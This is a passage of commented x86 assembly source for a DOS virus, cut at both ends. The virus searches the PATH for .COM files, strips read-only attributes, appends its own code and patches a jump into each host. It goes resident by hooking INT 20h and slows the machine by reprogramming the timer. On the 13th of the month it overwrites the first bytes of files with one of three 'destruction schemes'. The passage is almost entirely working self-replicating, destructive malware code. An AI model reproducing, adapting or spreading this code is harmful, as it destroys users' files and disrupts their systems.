;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Error:
|
||||
CMP WORD PTR [SI+16H],0
|
||||
JNE Set_Virus_Path ;
|
||||
JMP Restore_Org_DTA ; Error occured. Restore
|
||||
; original DTA,
|
||||
; 1st three bytes and
|
||||
; execute original
|
||||
; program.
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Start Searching for PATH ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_Virus_Path:
|
||||
PUSH DS ; Store Registers
|
||||
PUSH SI
|
||||
PUSH AX
|
||||
PUSH ES
|
||||
PUSH ES
|
||||
POP DS ; DS=ES
|
||||
PUSH BX
|
||||
MOV BX,2CH
|
||||
MOV AX,[BX]
|
||||
POP BX ; Restore BX
|
||||
MOV [SI+1FH],AX ;
|
||||
MOV DI,SI ;
|
||||
MOV AX,[DI+16H] ; Org.address of PATH
|
||||
MOV SI,AX ;
|
||||
MOV DS,[DI+1FH] ;
|
||||
POP ES ;
|
||||
POP AX ;
|
||||
ADD DI,26H ;
|
||||
Reached_EO_Path:
|
||||
LODSB ; Get byte into AL
|
||||
CMP AL,3BH ; Path Delimiter ';' reached?
|
||||
JE Delimiter_Reached ; Yes
|
||||
CMP AL,0 ; End of Path reached?
|
||||
JE EO_Path_Reached ; Yes
|
||||
STOSB ; Store byte in AL
|
||||
JMP SHORT Reached_EO_Path ;
|
||||
EO_Path_Reached:
|
||||
MOV SI,0 ;
|
||||
Delimiter_Reached:
|
||||
POP BX ;
|
||||
POP DS ;
|
||||
MOV [BX+16H],SI ;
|
||||
CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by
|
||||
; a backslash?
|
||||
JE Find_First_FileName ; Yes
|
||||
MOV AL,5CH ;
|
||||
STOSB ; Place Backslash
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Find First Filename ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Find_First_FileName:
|
||||
MOV [BX+18H],DI ; Store at which address
|
||||
; the path starts
|
||||
; BX=SI
|
||||
MOV SI,BX ; Restore SI
|
||||
ADD SI,10H ;
|
||||
MOV CX,6 ;
|
||||
REP MOVSB ; Set Search.Spec.
|
||||
MOV SI,BX ; Restore SI
|
||||
|
||||
MOV AH,4EH ;
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ; Filename:= *.COM
|
||||
MOV CX,3 ; Search Attributes:
|
||||
; Read Only/Hidden
|
||||
INT 21H ; Find 1st Filename to
|
||||
; match with DS:DX
|
||||
JMP SHORT Error_Handler ;
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Find Next Filename ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Find_Next_FileName:
|
||||
MOV AH,4FH ;
|
||||
INT 21H ; Find next Filename to
|
||||
; match with DS:DX
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Error Handler ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Error_Handler:
|
||||
JNC Check_Filelength ; Jump if carry=0, so
|
||||
; no errors
|
||||
JMP SHORT Error ; Carry Set, so error
|
||||
; occured
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Check Filelength and look if file is already infected. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
Check_Filelength:
|
||||
MOV AX,DS:DATA_1E[SI] ; (761D:0064=0)
|
||||
AND AL,1FH
|
||||
CMP AL,7
|
||||
JE Find_Next_FileName ; File already infected.
|
||||
CMP WORD PTR DS:DATA_3E[SI],0FA00H
|
||||
; Is the length of the
|
||||
; file more as FA00h bytes?
|
||||
JA Find_Next_FileName ; Yes.
|
||||
CMP WORD PTR DS:DATA_3E[SI],0F00H
|
||||
; Is the length of the
|
||||
; file less as 0F00h bytes?
|
||||
JB Find_Next_FileName ; Yes
|
||||
MOV DI,[SI+18H] ; Get address of path of virus
|
||||
PUSH SI ; Store SI
|
||||
ADD SI,6CH
|
||||
Set_FileName:
|
||||
LODSB ; Set up Filename for
|
||||
STOSB ; infection.
|
||||
CMP AL,0 ; End Of Filename Reached?
|
||||
JNE Set_FileName ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set Temporary File attributes ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
POP SI ; Restore SI
|
||||
MOV CX,[SI+63H] ;
|
||||
MOV CH,0 ;
|
||||
MOV [SI+8],CX ; Get File-Attributes
|
||||
MOV AX,CX ;
|
||||
MOV CX,0FFFEH ;
|
||||
AND AX,CX ; Remove Read-Only Attribute
|
||||
MOV CX,AX ;
|
||||
MOV AX,4301H ;
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Set File-Attributes
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Open the File ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AX,3D02H ; Open the file for both
|
||||
INT 21H ; reading and writing
|
||||
JNC Give_Infection_Marker ; If no error occured...
|
||||
JMP Set_FileAttributes_Back ; Error occured
|
||||
|
||||
Give_Infection_Marker:
|
||||
MOV BX,AX
|
||||
MOV CX,DS:DATA_2E[SI] ; (761D:0066=0)
|
||||
MOV [SI+6],CX
|
||||
MOV CX,DS:DATA_1E[SI] ; (761D:0064=0)
|
||||
AND CL,0E0H
|
||||
OR CL,7
|
||||
MOV [SI+4],CX
|
||||
JMP SHORT Get_Current_Time ; (2967)
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ This Part will be installed resident after hooking INT 20h ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
PUSHF ; Push flags
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SS
|
||||
PUSH AX
|
||||
PUSH BX
|
||||
PUSH DX
|
||||
PUSH DI
|
||||
PUSH SI
|
||||
PUSH BP
|
||||
MOV DX,43H
|
||||
MOV AL,74H ; This will change the refesh
|
||||
OUT DX,AL ; rate, thus slowing down the
|
||||
MOV DX,41H ; PC. Every normal program-
|
||||
MOV AL,8 ; termination by calling
|
||||
OUT DX,AL ; INT 20h will call this
|
||||
MOV AL,7 ; rourtine
|
||||
OUT DX,AL ;
|
||||
POP BP
|
||||
POP SI
|
||||
POP DI
|
||||
POP DX
|
||||
POP BX
|
||||
POP AX
|
||||
POP SS
|
||||
POP ES
|
||||
POP DS
|
||||
POPF ; Pop flags
|
||||
JMP CS:DATA_5 ; (761D:0253=9090H)
|
||||
; JMP to org. INT 20h address
|
||||
ADD [BX+SI],AL
|
||||
ADD [BX+SI],AL
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get Current Time ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Get_Current_Time:
|
||||
PUSH AX ; Store all registers
|
||||
PUSH BX
|
||||
PUSH CX
|
||||
PUSH DX
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SI
|
||||
PUSH DI
|
||||
PUSH BP
|
||||
MOV AH,2CH ; Get current time into CX:DX
|
||||
INT 21H ; CX=hrs/min, DX=sec/hund.sec
|
||||
CMP DL,32H ; Are we above 32/100 seconds?
|
||||
JA Get_INT_F2_Vector ; Yes
|
||||
JMP Start_Trigger_Check ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get Interrupt Vector of INT F2h ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Get_INT_F2_Vector:
|
||||
MOV AH,35H ; Get the interrupt vector of
|
||||
MOV AL,0F2H ; INT 0F2h into ES:BX
|
||||
INT 21H ;
|
||||
|
||||
CMP BX,7777H ; Was INT F2 already hooked?
|
||||
|
||||
JNE Allocate_Memory ; No
|
||||
JMP INT_F2_Already_Hooked ;
|
||||
Allocate_Memory:
|
||||
MOV AX,DS ;
|
||||
DEC AX ;
|
||||
MOV ES,AX ;
|
||||
MOV BX,0 ;
|
||||
CMP BYTE PTR ES:[BX],5AH ;
|
||||
JE Memory_Already_Allocated
|
||||
PUSH BX ;
|
||||
MOV AH,48H ; Allocate 4096 16-byte-para-
|
||||
MOV BX,0FFFFH ; graphs in memory. ???
|
||||
INT 21H ;
|
||||
CMP BX,5 ; Is the largest available
|
||||
; 5 or higher?
|
||||
JAE Again_Allocate_Memory ; Yes
|
||||
JMP Start_Trigger_Check ; No
|
||||
Again_Allocate_Memory:
|
||||
MOV AH,48H ; Again allocate memory
|
||||
INT 21H ;
|
||||
POP BX ;
|
||||
JNC Segment_Decrease ; If there was no error when
|
||||
; allocating memory the last
|
||||
; time
|
||||
JMP Start_Trigger_Check ; If there was an error
|
||||
Segment_Decrease:
|
||||
DEC AX ; Decrease Segment of Allcated
|
||||
; memory
|
||||
MOV ES,AX ;
|
||||
MOV BX,1 ;
|
||||
MOV WORD PTR ES:[BX],0 ;
|
||||
MOV BX,0 ;
|
||||
CMP BYTE PTR ES:[BX],5AH ;
|
||||
JE Memory_Allocated ;
|
||||
JMP SHORT Start_Trigger_Check
|
||||
NOP ;
|
||||
Memory_Allocated:
|
||||
MOV BX,3 ;
|
||||
ADD AX,ES:[BX] ;
|
||||
INC AX ;
|
||||
MOV BX,12H ;
|
||||
MOV ES:[BX],AX ;
|
||||
Memory_Already_Allocated:
|
||||
MOV BX,3 ;
|
||||
MOV AX,ES:[BX] ;
|
||||
SUB AX,5 ;
|
||||
JC Start_Trigger_Check ; Jump if carry Set
|
||||
MOV ES:[BX],AX ;
|
||||
MOV BX,12H ;
|
||||
SUB WORD PTR ES:[BX],5 ;
|
||||
MOV ES,ES:[BX] ;
|
||||
PUSH SI ; Store SI
|
||||
SUB SI,1F2H ; SI points to the part
|
||||
MOV DI,0 ; which must become
|
||||
MOV CX,46H ; resident.
|
||||
REP MOVSB ; Move the 46h bytes from
|
||||
; [SI] to ES:[DI]
|
||||
POP SI ; Restore SI
|
||||
MOV BP,ES ;
|
||||
PUSH CS ;
|
||||
POP ES ; Restore ES
|
||||
|
||||
MOV AH,25H ; Hook interrupt F2h
|
||||
MOV AL,0F2H ; New INT-vector will
|
||||
MOV DX,7777H ; be DS:7777h
|
||||
INT 21H ;
|
||||
JMP SHORT Hook_INT_20h ; (2A10)
|
||||
NOP
|
||||
|
||||
INT_F2_Already_Hooked:
|
||||
JMP SHORT Start_Trigger_Check
|
||||
NOP
|
||||
Hook_INT_20h:
|
||||
MOV AL,20H ;
|
||||
MOV AH,35H ; Get the INT 20h Vector
|
||||
INT 21H ; into ES:BX
|
||||
|
||||
MOV DX,ES ;
|
||||
MOV ES,BP ;
|
||||
PUSH SI ;
|
||||
MOV AX,SI ;
|
||||
SUB AX,1CAH ;
|
||||
MOV DI,SI ;
|
||||
SUB DI,1F2H ;
|
||||
SUB AX,DI ;
|
||||
MOV SI,AX ;
|
||||
MOV ES:[SI],BX ;
|
||||
ADD SI,2 ;
|
||||
MOV ES:[SI],DX ;
|
||||
SUB SI,4 ;
|
||||
MOV ES:[SI],AX ;
|
||||
POP SI ;
|
||||
PUSH CS ;
|
||||
POP ES ;
|
||||
|
||||
MOV AH,25H ; Install new INT 20h
|
||||
MOV DS,BP ; vector to DS:DX
|
||||
MOV DX,0 ; (=DS:00)
|
||||
MOV AL,20H ;
|
||||
INT 21H ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Start Trigger Check ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Start_Trigger_Check:
|
||||
POP BP ; Restore Registers
|
||||
POP DI
|
||||
POP SI
|
||||
POP ES
|
||||
POP DS
|
||||
POP DX
|
||||
POP CX
|
||||
POP BX
|
||||
POP AX
|
||||
MOV AH,2AH ; Get the current date
|
||||
INT 21H ; CX=year, DX=mon/day
|
||||
CMP DL,0DH ; Is it the 13th of the month?
|
||||
JNE Start_Infecting_File ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ It is the 13th of the Month... Select 1 out of 3 destructions ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AH,2CH ; Get current time
|
||||
INT 21H ; CX=hrs/min, DX=sec/hund.sec
|
||||
CMP DL,3CH ; Are we above 60/100 seconds?
|
||||
JA Destruction_2 ; Yes
|
||||
CMP DL,1EH ; Are we above 30/100 seconds?
|
||||
JA Destruction_3 ; Yes
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 1: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: MOV AH,00 ÛÛ
|
||||
;ÛÛ INT 20h ÛÛ
|
||||
;ÛÛ NOP ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will terminate at once with returning to DOS. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV DX,SI
|
||||
ADD DX,21H
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 2: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ DB CDh (which is the opcode for INT) ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will execute the 4 HLT's and then perform an INT-Call depending on ÛÛ
|
||||
;ÛÛ the byte following CDh. This can be any INT-Call. So this scheme ÛÛ
|
||||
;ÛÛ can be consisered the dangeroust of all three destruction schemes. ÛÛ
|
||||
;ÛÛ will terminate at once with returning to DOS. The first five bytes ÛÛ
|
||||
;ÛÛ of a file will be overwritten always, making the file useless, but ÛÛ
|
||||
;ÛÛ issuing and 'random' INT-Call can do much more harm. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Destruction_2:
|
||||
MOV DX,SI
|
||||
ADD DX,79H
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 3: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: INT 19h ÛÛ
|
||||
;ÛÛ INT 19h ÛÛ
|
||||
;ÛÛ DB ? (Can be anything. It is the 1st byte of the org.file) ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will cause a reboot without a memory test and preserving the ÛÛ
|
||||
;ÛÛ interrupt vectors. If any interrupt vector from 00h through 1Ch has ÛÛ
|
||||
;ÛÛ been set, the system most likely will hang itself, because of this ÛÛ
|
||||
;ÛÛ preserving. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Destruction_3:
|
||||
MOV DX,SI
|
||||
ADD DX,7DH
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Write the 5 bytes with the destruction to the begining of the file ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Write_5_Destruction_Bytes:
|
||||
MOV AH,40H ;
|
||||
MOV CX,5 ;
|
||||
INT 21H ; Write 5 bytes to the file
|
||||
JMP SHORT Set_FileDate_Time_Back
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ It is not the 13th of the month... Infect the file ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Start_Infecting_File:
|
||||
MOV AH,3FH ;
|
||||
MOV CX,3 ; Number of bytes to read
|
||||
MOV DX,0AH ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Read the bytes from the file
|
||||
; and put them at DS:DX
|
||||
JC Set_FileDate_Time_Back ; If Error Occurred
|
||||
CMP AL,3 ; 3 Bytes read?
|
||||
JNE Set_FileDate_Time_Back ; No
|
||||
|
||||
|
||||
MOV AX,4202H ; Set the Read/Write
|
||||
MOV CX,0 ; pointer to the EOF at
|
||||
MOV DX,0 ; offset CX:DX (=00:00)
|
||||
INT 21H ;
|
||||
|
||||
MOV CX,AX ; CX=Length of File
|
||||
SUB AX,3 ;
|
||||
MOV [SI+0EH],AX ; Store Length -3 bytes
|
||||
ADD CX,41DH ; CX=CX+41Dh
|
||||
MOV DI,SI
|
||||
SUB DI,318H
|
||||
MOV [DI],CX ; Set new Virus Data Area
|
||||
; Address into code
|
||||
MOV AH,40H ;
|
||||
MOV CX,3ABH ; CX=3ABh The length of the
|
||||
; viral-code written to disk.
|
||||
MOV DX,SI
|
||||
SUB DX,31DH ; DX points at the start of
|
||||
; the virus code
|
||||
INT 21H ; Write the viral-code to the
|
||||
; file
|
||||
|
||||
JC Set_FileDate_Time_Back ; If an error occured
|
||||
CMP AX,3ABH ; 3ABh bytes written?
|
||||
JNE Set_FileDate_Time_Back ; No
|
||||
MOV AX,4200H ; Move Read/Write Pointer to
|
||||
MOV CX,0 ; the beginning of the file
|
||||
MOV DX,0 ; at offset CX:DX(=00:00)
|
||||
INT 21H ;
|
||||
|
||||
MOV AH,40H ; Write the 1st three new
|
||||
MOV CX,3 ; bytes to the file. These
|
||||
MOV DX,SI ; bytes contain the JMP
|
||||
ADD DX,0DH ; instruction to the virus.
|
||||
INT 21H ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set File-Time/Date back ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_FileDate_Time_Back:
|
||||
MOV DX,[SI+6] ; Get File-Date
|
||||
MOV CX,[SI+4] ; Get File-Time
|
||||
MOV AX,5701H ; Set back the File-Time and
|
||||
INT 21H ; Date stamps
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
